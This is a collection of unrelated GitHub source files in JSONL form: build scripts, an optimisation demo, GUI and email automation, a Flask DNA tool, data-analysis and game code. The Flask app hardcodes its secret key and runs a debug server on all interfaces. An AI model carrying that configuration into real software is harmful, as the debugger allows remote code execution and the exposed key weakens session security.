程序......')\n os.system('rm -rf build/Ashore.Linux.file')\n os.system('rm -rf dist/Ashore.Linux.file')\n os.system('pyinstaller bale/Ashore.Linux.file.spec')\n os.system('mkdir dist/Ashore.Linux.file')\n os.system('mkdir dist/Ashore.Linux.file/Ashore')\n os.system('mv dist/Ashore dist/Ashore.Linux.file/Ashore')\n os.system('cp static/icon/icon.funtion/icon0.png dist/Ashore.Linux.file/Ashore/icon.png')\n os.system('cp bale/ashore.desktop dist/Ashore.Linux.file/Ashore')\n os.system('cp bale/make.Ashore.Linux.file.sh dist/Ashore.Linux.file/Ashore/make.sh')\n print('单文件 Ashore 打包完毕')\n cmd = 'nautilus dist/Ashore.Linux.file/Ashore/Ashore --select'\n subprocess.Popen([cmd],shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n elif flag == '2':\n print('......开始make为 文件夹 程序......')\n os.system('rm -rf build/Ashore.Linux.folder')\n os.system('rm -rf dist/Ashore.Linux.folder')\n os.system('pyinstaller bale/Ashore.Linux.folder.spec')\n os.system('mkdir dist/Ashore.Linux.folder')\n os.system('mv -f dist/Ashore dist/Ashore.Linux.folder')\n os.system('cp static/icon/icon.funtion/icon0.png dist/Ashore.Linux.folder/Ashore/icon.png')\n os.system('cp bale/ashore.desktop dist/Ashore.Linux.folder')\n os.system('cp bale/make.Ashore.Linux.folder.sh dist/Ashore.Linux.folder/make.sh')\n print('文件夹 Ashore 打包完毕')\n cmd = 'nautilus dist/Ashore.Linux.folder/Ashore/Ashore --select'\n subprocess.Popen([cmd],shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n else:\n print('error')\n elif platform.system() == 'Windows':\n print('当前系统为:Windows')","repo_name":"PanZK/Ashore","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"5264739918","text":"from typing import List, Tuple, Dict, Any, Callable, Optional, Iterable\nfrom logging import Logger, getLogger\nfrom enum import Enum\n\nfrom numpy import ndarray, linspace, power, ones, zeros, zeros_like\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.axes import Axes\nfrom matplotlib.widgets import Slider, Button\nfrom matplotlib.lines import Line2D\nfrom freq_used.logging_utils import set_logging_basic_config\nfrom freq_used.plotting import get_figure\n\nfrom optmlstat.functions.function_base import FunctionBase\nfrom optmlstat.functions.basic_functions.affine_function import AffineFunction\nfrom optmlstat.functions.basic_functions.quadratic_function import QuadraticFunction\n\n\nlogger: Logger = getLogger()\nmpl.use(\"TkAgg\")\n\n\nLAGRANGE_MULTIPLIER_SLIDER_WIDTH: float = 0.2\nLAGRANGE_MULTIPLIER_SLIDER_HEIGHT: float = 0.03\nLAGRANGE_MULTIPLIER_CENTER_POSITION: float = 0.3\nLAGRANGE_MULTIPLIER_SLIDER_BOTTOM_POSITION: float = 0.90\nLAGRANGE_MULTIPLIER_SLIDER_COLOR: str = \"lightgoldenrodyellow\"\n\nRESET_BUTTON_WIDTH: float = 0.1\nRESET_BUTTON_HEIGHT: float = 0.03\nRESET_BUTTON_CENTER_POSITION: float = 0.6\nRESET_BUTTON_BOTTOM_POSITION: float = 0.90\n\n\nclass ButtonSliderBase:\n \"\"\"\n Base class for Button or Slider class.\n \"\"\"\n\n def __init__(\n self, figure: Figure, width: float, height: float, center_position: float, bottom_position: float\n ) -> None:\n self.figure: Figure = figure\n self.width: float = width\n self.height: float = height\n self.center_position: float = center_position\n self.bottom_position: float = bottom_position\n\n self.axis: Axes = figure.add_axes(\n [self.center_position - self.width / 2.0, self.bottom_position, self.width, self.height]\n )\n\n\nclass MySlider(ButtonSliderBase):\n \"\"\"\n Wrapper class for matplotlib.widgets.Slider.\n \"\"\"\n\n def __init__(\n self,\n figure: Figure,\n width: float,\n height: float,\n center_position: float,\n bottom_position: float,\n slider_kwargs: Dict[str, Any],\n ) -> None:\n super(MySlider, self).__init__(figure, width, height, center_position, bottom_position)\n\n self.slider: Slider = Slider(ax=self.axis, **slider_kwargs)\n\n\nclass MyButton(ButtonSliderBase):\n \"\"\"\n Wrapper class for matplotlib.widgets.Slider.\n \"\"\"\n\n def __init__(\n self,\n figure: Figure,\n width: float,\n height: float,\n center_position: float,\n bottom_position: float,\n button_kwargs: Dict[str, Any],\n ) -> None:\n super(MyButton, self).__init__(figure, width, height, center_position, bottom_position)\n\n self.button: Button = Button(ax=self.axis, **button_kwargs)\n\n\nclass LagrangianIllustrator:\n \"\"\"\n This class shows graphically how Lagrange multipliers work\n to help clients obtain geometrical understanding of their role in constrained optimization.\n\n Consider the following (one-dimensional) equality constrained optimization problem:\n\n minimize f(x)\n subject to h(x) >= 0 or h(x) = 0 or h(x) <= 0\n\n where f: R -> R and h: R -> R are the objective function and constraint function respectively.\n Depending on the type of constraint, the interpretation of the Lagrange multiplier changes.\n\n The Lagrangian is defined by\n\n L(x, lambda) = f(x) + lambda h(x)\n\n The Lagrange dual function is defined by\n\n g(lambda) = inf_x L(x, lambda)\n\n If the constraint in the above problem is \">=\", then lambda <=0,\n and if the constraint is \"<=\", then lambda >= 0,\n and if the constraint is \"=\", then lambda can take any real values.\n \"\"\"\n\n NUM_PLOTTING_POINTS: int = 100\n ALPHA: float = 0.5\n\n def __init__(\n self,\n obj_fcn: FunctionBase,\n const_fcn: FunctionBase,\n cnst_boundary_points: Iterable[float],\n minimum_point_fcn: Optional[Callable] = None,\n minimum_value_fcn: Optional[Callable] = None,\n ) -> None:\n self.obj_fcn: FunctionBase = obj_fcn\n self.const_fcn: FunctionBase = const_fcn\n self.cnst_boundary_points: List[float] = list(cnst_boundary_points)\n\n self.minimum_point_fcn: Callable = lambda x: 0.0\n if minimum_point_fcn is not None:\n self.minimum_point_fcn = minimum_point_fcn\n\n self.minimum_value_fcn: Callable = lambda x: 0.0\n if minimum_value_fcn is not None:\n self.minimum_value_fcn = minimum_value_fcn\n\n def create_interactive_plot(\n self, x_min: float, x_max: float, lambda_min: float, lambda_max: float, initial_lambda: float\n ) -> Figure:\n\n x_array_1d: ndarray = linspace(x_min, x_max, LagrangianIllustrator.NUM_PLOTTING_POINTS)\n obj_fcn_array_1d: ndarray = self.obj_fcn.get_y_values_2d_from_x_values_1d(x_array_1d).ravel()\n cnst_fcn_array_1d: ndarray = self.const_fcn.get_y_values_2d_from_x_values_1d(x_array_1d).ravel()\n\n figure: Figure = get_figure(\n 1, 1, axis_width=4, axis_height=3, left_margin=0.5, right_margin=3.0, bottom_margin=0.5\n )\n axis: Axes = figure.get_axes()[0]\n\n axis.plot(x_array_1d, obj_fcn_array_1d, \"k-\", label=\"objective function\", alpha=LagrangianIllustrator.ALPHA)\n axis.plot(\n x_array_1d, cnst_fcn_array_1d, \"b-\", label=\"equality constraint function\", alpha=LagrangianIllustrator.ALPHA\n )\n ylim: Tuple[float] = axis.get_ylim()\n for cnst_boundary_point in self.cnst_boundary_points:\n axis.plot(\n ones(2) * cnst_boundary_point,\n ylim,\n \"b-.\",\n label=\"constraint boundary\",\n alpha=LagrangianIllustrator.ALPHA,\n )\n\n lagrangian_line_2d_list: List[Line2D] = axis.plot(x_array_1d, zeros_like(x_array_1d), \"r-\", label=\"Lagrangian\")\n lagrangian_minimum_x_list_2d_list = axis.plot(zeros(2), ylim, \"r-.\", label=\"Lagrangian minimum x\")\n lagrangian_minimum_y_line_2d_list: List[Line2D] = axis.plot(\n [x_min, x_max], zeros(2), \"r-.\", label=\"Lagrangian minimum y\"\n )\n\n obj_minimum_point_line_2d_list: List[Line2D] = axis.plot([0.0], [0.0], \"o\", markersize=8)\n lagrangian_minimum_point_line_2d_list: List[Line2D] = axis.plot(\n [0.0], [0.0], \"o\", markersize=8, markerfacecolor=\"r\", markeredgecolor=\"none\"\n )\n\n axis.legend(bbox_to_anchor=(1.05, 0.9))\n\n assert len(lagrangian_line_2d_list) == 1\n assert len(lagrangian_minimum_y_line_2d_list) == 1\n assert len(lagrangian_minimum_x_list_2d_list) == 1\n assert len(obj_minimum_point_line_2d_list) == 1\n assert len(lagrangian_minimum_point_line_2d_list) == 1\n\n lagrangian_line_2d: Line2D = lagrangian_line_2d_list[0]\n lagrangian_minimum_x_list_2d: Line2D = lagrangian_minimum_x_list_2d_list[0]\n lagrangian_minimum_y_line_2d: Line2D = lagrangian_minimum_y_line_2d_list[0]\n lagrangian_minimum_point_line_2d: Line2D = lagrangian_minimum_point_line_2d_list[0]\n\n obj_minimum_point_line_2d: Line2D = obj_minimum_point_line_2d_list[0]\n\n def update_lagrangian_in_x(value: float):\n lagrangian_minimum_x: float = self.minimum_point_fcn(value)\n lagrangian_minimum_y: float = self.minimum_value_fcn(value)\n\n lagrangian_line_2d.set_ydata(obj_fcn_array_1d + value * cnst_fcn_array_1d)\n lagrangian_minimum_x_list_2d.set_xdata(ones(2) * lagrangian_minimum_x)\n lagrangian_minimum_y_line_2d.set_ydata(lagrangian_minimum_y * ones(2))\n lagrangian_minimum_point_line_2d.set_xdata(ones(1) * lagrangian_minimum_x)\n lagrangian_minimum_point_line_2d.set_ydata(ones(1) * lagrangian_minimum_y)\n\n obj_minimum_point_line_2d.set_xdata(ones(1) * lagrangian_minimum_x)\n obj_minimum_point_line_2d.set_ydata(\n ones(1) * obj_fcn.get_y_values_2d_from_x_values_1d(ones(1) * lagrangian_minimum_x).ravel()\n )\n if self.const_fcn.get_y_values_2d_from_x_values_1d(ones(1) * lagrangian_minimum_x)[0, 0] <= 0.0:\n obj_minimum_point_line_2d.set_color(\"b\")\n else:\n obj_minimum_point_line_2d.set_color(\"r\")\n\n figure.canvas.draw_idle()\n\n lagrange_multiplier_slider: MySlider = MySlider(\n figure,\n LAGRANGE_MULTIPLIER_SLIDER_WIDTH,\n LAGRANGE_MULTIPLIER_SLIDER_HEIGHT,\n LAGRANGE_MULTIPLIER_CENTER_POSITION,\n LAGRANGE_MULTIPLIER_SLIDER_BOTTOM_POSITION,\n dict(label=\"Lagrange multiplier\", valmin=lambda_min, valmax=lambda_max, valinit=initial_lambda),\n )\n lagrange_multiplier_slider.slider.on_changed(update_lagrangian_in_x)\n\n def reset(event):\n lagrange_multiplier_slider.slider.reset()\n\n reset_button: MyButton = MyButton(\n figure,\n RESET_BUTTON_WIDTH,\n RESET_BUTTON_HEIGHT,\n RESET_BUTTON_CENTER_POSITION,\n RESET_BUTTON_BOTTOM_POSITION,\n dict(label=\"Reset\"),\n )\n reset_button.button.on_clicked(reset)\n\n update_lagrangian_in_x(initial_lambda)\n\n plt.show()\n\n return figure\n\n\nclass Problem(Enum):\n LCQM: int = 10 # linearly constrained quadratic program\n QCLM: int = 20 # quadratically constrained linear program\n\n\nif __name__ == \"__main__\":\n\n set_logging_basic_config(__file__)\n\n case: Problem\n case_num: int = int(input(\"case? \"))\n if case_num == 1:\n case = Problem.LCQM\n elif case_num == 2:\n case = Problem.QCLM\n else:\n assert False, case_num\n\n obj_fcn: FunctionBase\n cnst_fcn: FunctionBase\n cnst_boundary_points: List[float]\n\n if case == Problem.LCQM:\n \"\"\"\n f(x) = x^2\n h(x) = x - 1\n \"\"\"\n obj_fcn = QuadraticFunction(ones((1, 1, 1)), zeros((1, 1)), zeros(1))\n cnst_fcn = AffineFunction(ones((1, 1)), -ones(1))\n\n cnst_boundary_points = [1.0]\n\n def minimum_of_lagrangian(nu: float) -> float:\n return -power(nu, 2.0) / 4.0 - nu\n\n def minimum_point(nu: float) -> float:\n return -nu / 2.0\n\n elif case == Problem.QCLM:\n \"\"\"\n f(x) = x\n h(x) = x^2 - 1\n\n L(x, lambda) = x + lambda (x^2 - 1)\n d L(x, lambda) / dx = 1 + 2 lambda x\n\n g(lambda) = - 1 / 2lambda + lambda(1/4lambda^2 - 1) = - 1 / 4lambda - lambda\n \"\"\"\n obj_fcn = AffineFunction(ones((1, 1)), zeros(1))\n cnst_fcn = QuadraticFunction(ones((1, 1, 1)), zeros((1, 1)), -ones(1))\n\n cnst_boundary_points = [-1.0, 1.0]\n\n def minimum_of_lagrangian(nu: float) -> float:\n return -nu - 1.0 / (4 * abs(nu) + 1e-6) * (1.0 if nu >= 0.0 else -1.0)\n\n def minimum_point(nu: float) -> float:\n return -1.0 / (2.0 * abs(nu) + 1e-6) * (1.0 if nu >= 0.0 else -1.0)\n\n else:\n assert False, case\n\n lambda_min: float = -8.0\n lambda_max: float = 8.0\n initial_lambda: float = 0.0\n\n x_min: float = -3.0\n x_max: float = 3.0\n\n lagrangian_illustrator: LagrangianIllustrator = LagrangianIllustrator(\n obj_fcn, cnst_fcn, cnst_boundary_points, minimum_point, minimum_of_lagrangian\n )\n lagrangian_illustrator.create_interactive_plot(x_min, x_max, lambda_min, lambda_max, initial_lambda)\n","repo_name":"sungheeyun/optmlstat","sub_path":"bin/lagrangian_interpretation_demo_1d.py","file_name":"lagrangian_interpretation_demo_1d.py","file_ext":"py","file_size_in_byte":11391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"4665456340","text":"import pyautogui\nimport pyperclip\nimport time\nimport pandas\n\npyautogui.PAUSE = 0.5\n\npyautogui.click(x=958, y=1054)\npyautogui.hotkey(\"ctrl\", \"t\")\npyautogui.write(\"https://drive.google.com/drive/folders/1YlfO_VVBlaM4MYPnHUSbOG3JHGJ81CDp?usp=sharing\")\npyautogui.press(\"enter\")\n\ntime.sleep(5)\n\npyautogui.click(x=501, y=283)\npyautogui.click(x=603, y=702)\n\ntime.sleep(5)\n\ntabela = pandas.read_csv(r\"/home/david/Downloads/compras.csv\", sep=\";\")\ntotal = tabela[\"ValorFinal\"].sum()\nquantidade = tabela[\"Quantidade\"].sum()\npreco_medio = total / quantidade\n\npyautogui.hotkey(\"ctrl\", \"t\")\npyautogui.write(\"https://mail.google.com/mail/u/0/#inbox\")\npyautogui.press(\"enter\")\n\ntime.sleep(5)\n\npyautogui.click(x=70, y=174)\npyautogui.write('davidspader97@gmail.com')\npyautogui.press('tab', presses=2)\npyperclip.copy('Relatório de vendas')\npyautogui.hotkey(\"ctrl\", \"v\")\npyautogui.press('tab')\ntext = f\"\"\"\nRelatório de vendas:\n\nTotal gasto: R$ {total:,.2f}\nQuantidade: {quantidade:,}\nPreço médio: R$ {preco_medio:,.2f}\n\n\"\"\"\npyperclip.copy(text)\npyautogui.hotkey(\"ctrl\", \"v\")\npyautogui.hotkey(\"ctrl\", \"enter\")","repo_name":"davidspader/python-automation","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2520988253","text":"from flask import Flask, render_template, request, flash\r\nimport os\r\n\r\n#Flask setup\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = '46d1ce3b317f4d2ce1d08512694d27b6'\r\n\r\n\r\n#Home Page of Web App\r\n@app.route(\"/\", methods=[\"POST\",\"GET\"])\r\n@app.route(\"/home\", methods=[\"POST\",\"GET\"])\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n#route for manually entering sequences\r\n@app.route(\"/enter_sequence\", methods=[\"POST\",\"GET\"])\r\ndef enter_sequence():\r\n flash(\"Please enter sequence:\")\r\n return render_template(\"enter_sequence.html\")\r\n\r\n\r\n#route for uploading sequences as plain text file\r\n@app.route(\"/upload_file\", methods=[\"POST\",\"GET\"])\r\ndef upload_file():\r\n return render_template(\"upload_file.html\")\r\n\r\n\r\n#Display output of manually entered sequence\r\n@app.route(\"/enter_sequence_output\", methods=[\"POST\",\"GET\"])\r\ndef enter_sequence_output():\r\n flash(\"Input sequence:\\n\"+str(request.form['sequence_input']))\r\n output = revComp(str(request.form['sequence_input']))\r\n if output == \"error\":\r\n flash(\"Error: input sequence contains non-DNA characters\")\r\n else:\r\n flash(\"Reverse complement sequence:\\n\"+output)\r\n flash(\"Enter another sequence:\")\r\n return render_template(\"enter_sequence.html\")\r\n\r\n\r\n#Display output of file-uploaded sequence\r\n@app.route(\"/upload_file_output\", methods=[\"POST\",\"GET\"])\r\ndef upload_file_output():\r\n file = request.files[\"file\"]\r\n if file.filename[-4:]!='.txt':\r\n flash(\"Error: No files or wrong file type uploaded\")\r\n return render_template(\"upload_file.html\")\r\n else:\r\n\r\n input=file.read().decode('utf-8')\r\n flash(\"Input sequence:\\n\"+input)\r\n output = revComp(input)\r\n if output == \"error\":\r\n flash(\"Error: Input sequence contains non-DNA characters\")\r\n else:\r\n flash(\"Reverse complement sequence:\\n\"+output)\r\n return render_template(\"upload_file.html\")\r\n\r\n\r\n#Algorithm for calculating reverse complement of DNA sequence\r\ndef revComp(str):\r\n out = ''\r\n for i in str:\r\n if i == 'A':\r\n out='T'+out\r\n elif i == 'a':\r\n out='t'+out\r\n elif i == 'T':\r\n out='A'+out\r\n elif i == 't':\r\n out='a'+out\r\n elif i == 'C':\r\n out='G'+out\r\n elif i == 'c':\r\n out='g'+out\r\n elif i == 'G':\r\n out='C'+out\r\n elif i == 'g':\r\n out='c'+out\r\n elif i == ' ': #allow spaces\r\n pass\r\n else:\r\n return 'error'\r\n return out\r\n\r\n\r\nif __name__ == '__main__':\r\n port = int(os.environ.get(\"PORT\", 5000))\r\n app.run(debug=True, host='0.0.0.0', port=port)\r\n","repo_name":"kennethzhang315/MiniApp-ReverseComplementCalculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24550624887","text":"import itertools\nimport operator\nimport functools\nimport math\n\n\neps = 1e-200\ninf = float(\"inf\")\n\n\ndef readint():\n return int(input())\n\n\nk = readint()\nn = readint()\n\nv = []\ntotal_c = dict()\n\nfor i in range(n):\n a_i, b_i = map(int, input().split())\n v.append((a_i, b_i))\n total_c[b_i] = total_c.get(b_i, 0) + 1\n\nv = sorted(v)\n\ns_in = 0\ns_out = 0\n\nlast_x = dict()\nlast_i = dict()\ntotal_last = 0\ntotal = n\nlast = inf\nfor x, y in v:\n if y in last_x:\n s_in += (x - last_x[y]) * last_i[y] * (total_c[y] - last_i[y])\n if last != inf:\n s_out += (x - last) * total_last * (n - total_last)\n last_x[y] = x\n last_i[y] = last_i.get(y, 0) + 1\n total_last += 1\n last = x\n\ns_out -= s_in\nprint(\"{:d}\\n{:d}\".format(s_in * 2, s_out * 2))","repo_name":"notantony/ml2019-hw","sub_path":"cf/dists.py","file_name":"dists.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2537553275","text":"import hde\nimport numpy as np\nfrom pm import *\nfrom scipy.stats import ortho_group\nfrom graph_class import *\nfrom sbm import *\n\n# Test bfs distance function\n# Example graph represented as a list of NumPy arrays\ngraph = [\n np.array([1, 2]), # Node 0, neighbors: 1, 2\n np.array([0, 3, 4]), # Node 1, neighbors: 0, 3, 4\n np.array([0, 5]), # Node 2, neighbors: 0, 5\n np.array([1]), # Node 3, neighbor: 1\n np.array([1, 5]), # Node 4, neighbors: 1, 5\n np.array([2, 4]) # Node 5, neighbors: 2, 4\n]\n\n# Call BFS to compute shortest distance between nodes 0 and 5\nshortest_distance = hde.bfs_shortest_distance(graph, 0, 5)\nprint(\"Shortest distance between nodes 0 and 5:\", shortest_distance)\n\n# Test power method\nmin_eigv = 0\nmax_eigv = 10\ndim = 5\nd = np.random.uniform(min_eigv, max_eigv, dim)\nV = ortho_group.rvs(dim = dim)\nA = V@np.diag(d)@V.T\np = 2\nprint(\"Original eigenvectors: \")\nprint(np.sort(d))\nU = power_method(A,p, tol = 1e-7, test = True, mode = 1)\n\n# Test shortest path distances\nadj_list = [\n [1],\n [0,2],\n [1,3,5],\n [2,6],\n [5,7],\n [4,2],\n [3],\n [4]\n]\n\n# Perform BFS starting from node 0 and get the shortest path distances\nj = 7\nprint(len(adj_list))\nshortest_distances = bfs_shortest_path_distances(adj_list, j)\nprint(shortest_distances)\n\n# Print the shortest path distances\nfor i in range(len(adj_list)):\n print(\"Dist(\", j, \",\", i,\") = \", shortest_distances[i])\n \n# Testing SBM\nex22 = example22(1.0, 0.5, 5)\nprint(ex22)\nG = gen_sbm_graph(1.0, 0.5, 5)\nprint(G.adj_matrix)\nprint(G.degs)\nprint(G.laplacian)\nprint(G.adj_list)\n\n# # Test hde matrix\n# pwd = \"/Users/guifre/cla_project/cla-project-drawing-graphs-by-eigenvectors\"\n# f = open(pwd + \"/data/add20.txt\", \"r\")\n# G = Graph(f)\n# m = 4\n# X = hde.hde(G, m)\n# B = hde_matrix(G.laplacian, X)\n# print(B)\n\n\n\n \n \n \n \n\n# # Test case for Gershgorin bound\n# # Given matrix\n# matrix = np.array([[3, 1, 2, 4],\n# [0, 6, 2, 1],\n# [1, 0, 4, 2],\n# [2, 1, 0, 5]])\n\n# print(gershogorin_bound(matrix))\n","repo_name":"pauromeu/cla-project-drawing-graphs-by-eigenvectors","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11707959815","text":"from matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport torch\n\n\ndef get_verts_colors(verts, color=None):\n \"\"\"\n Args:\n color: either [r, g, b] with each color in [0, 1] or None\n if None, maps xyz as color\n \"\"\"\n if color is None:\n batch_size = verts.shape[0]\n colors = verts - verts.mean(1).unsqueeze(1)\n colors = colors / colors.norm(2, 2).max(1)[0].view(batch_size, 1, 1)\n colors = colors / 2 + 0.5\n else:\n colors = torch.ones_like(verts)\n colors[:, :, 0] = color[0] * colors[:, :, 0]\n colors[:, :, 1] = color[1] * colors[:, :, 1]\n colors[:, :, 2] = color[2] * colors[:, :, 2]\n return colors\n\n\ndef squashfig(fig=None):\n # TomNorway - https://stackoverflow.com/a/53516034\n if not fig:\n fig = plt.gcf()\n\n plt.subplots_adjust(0, 0, 1, 1, 0, 0)\n for ax in fig.axes:\n if isinstance(ax, Axes3D):\n ax.margins(0, 0, 0)\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.yaxis.set_major_locator(plt.NullLocator())\n ax.zaxis.set_major_locator(plt.NullLocator())\n else:\n ax.axis(\"off\")\n ax.margins(0, 0)\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.yaxis.set_major_locator(plt.NullLocator())\n","repo_name":"hassony2/handobjectconsist","sub_path":"meshreg/visualize/consistdisplay.py","file_name":"consistdisplay.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"44"} +{"seq_id":"39214611213","text":"from django.shortcuts import render,redirect,render_to_response\nfrom StudentInformationSystem.forms import PersonInfoForm\nfrom StudentInformationSystem.models import PersonalInfo\nfrom django.http import HttpResponse,HttpResponseRedirect\n\n\ndef index(request):\n\treturn HttpResponse(\"WELCOME TO STUDENT INFORMATION SYSTEM\")\n\n\ndef base(request):\n if request.method == \"POST\":\n form = PersonInfoForm(request.POST)\n if form.is_valid():\n PersonInfo = form.save(commit=False)\n PersonInfo.save()\n return redirect('success')\n else:\n form = PersonInfoForm()\n return render(request, 'StudentInformationSystem/base.html', {'form': form})\n\t\ndef display(request):\n try:\n Student = PersonalInfo.objects.all()\n except PersonalInfo.DoesNotExist:\n raise Http404(\"Comment does not exist\")\n \n return render(request, \"StudentInformationSystem/display.html\",{'Student': Student})","repo_name":"bvrit-wise-django-team/django_project_t4","sub_path":"resumebuildermodel/resume/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20930374561","text":"import pandas as pd \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as stats\nimport seaborn as sns\nfrom helper_functions import *\n\nif __name__ == '__main__':\n \n #use cleaning Class \n path = '~/galvanize/Capstone_1/git_info_wine_ratings/data/winemag-data-130k-v2.csv'\n cleaner = DataClean(path)\n cleaner.replace_val(86909, 'variety', 'Cabernet Sauvignon')\n cleaner.drop_null_rows(['country'])\n cols = ['country', 'description', 'points']\n df = cleaner.clean_df(cols)\n\n\n #make another column that counts the length of the description\n df['description_length'] = df['description'].str.len()\n\n\n #median is exactly 88\n med = np.median(df['points'])\n below_88_df = df[['points','description_length']][df['points'] < med]\n above_88_df = df[['points','description_length']][df['points'] > med]\n\n\n #add extra column for hue\n df['above_median_rating']=df['points']>med\n #look at all ratings at median\n All_but_88 = df[df['points']!=med]\n\n #VIOLIN PLOT\n fig, ax = plt.subplots(1, figsize=(12, 8))\n sns.violinplot('points', 'description_length', hue = 'above_median_rating', data = All_but_88, palette=\"Set2\", ax = ax)\n ax.set_title('Above and Below Median Vairance')\n plt.savefig('desc_per_rate_violin.png')\n #plt.show()\n\n \n p_val = stats.ttest_ind(below_88_df['description_length'], above_88_df['description_length'])[1]\n print(f'The p value is {p_val}.')\n\n correlation = stats.spearmanr(df['points'], df['description_length'])\n print(correlation)\n #cor coef = 0.5, p_val = 0\n\n\n below_des_med = df[['points','description_length']][df['description_length'] < 237]\n above_des_med = df[['points','description_length']][df['description_length'] > 237]\n\n fig, ax = plt.subplots(1)\n ax.scatter(below_des_med['description_length'], below_des_med['points'], color = 'blue', alpha = 0.5)\n ax.scatter(above_des_med['description_length'], above_des_med['points'], color = 'green', alpha = 0.5)\n ax.set_ylabel('Rating')\n ax.set_xlabel('Description Length')\n ax.set_title('Rating per Length of Description')\n plt.savefig('points_scatter_per_desc.png')\n plt.show()\n plt.close()\n\n p_val_desc = stats.ttest_ind(below_des_med['points'], above_des_med['points'])[1]\n\n fig, ax = plt.subplots(1)\n sns.scatterplot(below_des_med['description_length'], below_des_med['points'], x_jitter= True, ax = ax)\n sns.scatterplot(above_des_med['description_length'], above_des_med['points'], x_jitter= True, ax = ax)\n plt.show()\n\n","repo_name":"hberginc/wine_ratings_data_analysis","sub_path":"src/Description_hypothesis.py","file_name":"Description_hypothesis.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"29363511104","text":"#!/usr/bin/env python3\n# Author: Armit\n# Create Time: 2023/11/06\n\nfrom modules.assets import *\nfrom modules.ui_configs import *\n\nfrom .utils import *\n\n\ndef make_bloch_qubits(loader:Loader, parent:NodePath):\n # bloch sphere\n blochNP = loader.loadModel(MO_SPHERE_HIGHPOLY).copyTo(parent)\n blochNP.setTexture(loader.loadTexture(TX_PLASMA))\n blochNP.setTransparency(TransparencyAttrib.MAlpha)\n blochNP.setColor(1, 1, 1, BLOCH_ALPHA)\n blochNP.setR(BLOCH_SLOPE)\n blochNP.setScale(BLOCH_SIZE)\n\n # axis X\n lines = LineSegs()\n lines.setThickness(AXIS_THICKNESS)\n lines.setColor(0.7, 0, 0, 0.7)\n lines.moveTo(0, 0, 0)\n lines.drawTo(+10, 0, 0)\n lines.drawTo(-10, 0, 0)\n axisNP = NodePath(lines.create())\n axisNP.setTextureOff()\n axisNP.reparentTo(blochNP)\n\n # axis Y\n lines = LineSegs()\n lines.setThickness(AXIS_THICKNESS)\n lines.setColor(0, 0.7, 0, 0.7)\n lines.moveTo(0, 0, 0)\n lines.drawTo(0, +10, 0)\n lines.drawTo(0, -10, 0)\n axisNP = NodePath(lines.create())\n axisNP.setTextureOff()\n axisNP.reparentTo(blochNP)\n\n # axis Z\n lines = LineSegs()\n lines.setThickness(AXIS_THICKNESS)\n lines.setColor(0.0, 0, 0.7, 0.7)\n lines.moveTo(0, 0, 0)\n lines.drawTo(0, 0, +10)\n lines.drawTo(0, 0, -10)\n axisNP = NodePath(lines.create())\n axisNP.setTextureOff()\n axisNP.reparentTo(blochNP)\n\n # qubit Alice\n qubit1NP = loader.loadModel(MO_SPHERE).copyTo(blochNP)\n qubit1NP.setTextureOff()\n qubit1NP.setTransparency(TransparencyAttrib.MAlpha)\n qubit1NP.setColor(*QUBIT_COLOR_ALICE)\n qubit1NP.setPos(0, QUBIT_OFFSET, 0)\n qubit1NP.setScale(QUBIT_SIZE)\n\n # qubit Bob\n qubit2NP = loader.loadModel(MO_SPHERE).copyTo(blochNP)\n qubit2NP.setTextureOff()\n qubit2NP.setTransparency(TransparencyAttrib.MAlpha)\n qubit2NP.setColor(*QUBIT_COLOR_BOB)\n qubit2NP.setPos(0, QUBIT_OFFSET, 0)\n qubit2NP.setScale(QUBIT_SIZE)\n\n return (blochNP, qubit1NP, qubit2NP), []\n","repo_name":"Kahsolt/Quantum-Chase-Game","sub_path":"client/modules/prefabs/bloch_qubit.py","file_name":"bloch_qubit.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74789509571","text":"#!/usr/bin/env python\n#^ used for the watchdog module to be recognised.\n\n'''\n\nAuthor: Joe Richards\n\nCreated Date: 28/02/2018\n\nPython Version 2.7\n\n'''\n\n#Import the modules.\nimport logging\nimport sys\nimport time\nimport smtplib\nfrom watchdog.events import FileSystemEventHandler\nfrom watchdog.observers import Observer\n\n#Set the global strings.\nglobal sendSMTP\nglobal logFile\nglobal fileName\n\n#Send smtp emails within Office365.\ndef sendsmtp(msgText):\n server = smtplib.SMTP(\"mail.messaging.microsoft.com\")\n message = 'Subject: {}\\n\\n{}'.format(\"Path Monitor\", msgText)\n server.sendmail(\"itsupport@\", \"itsupport@\", message)\n server.quit()\n\n#Class for the watchdog monitor.\nclass 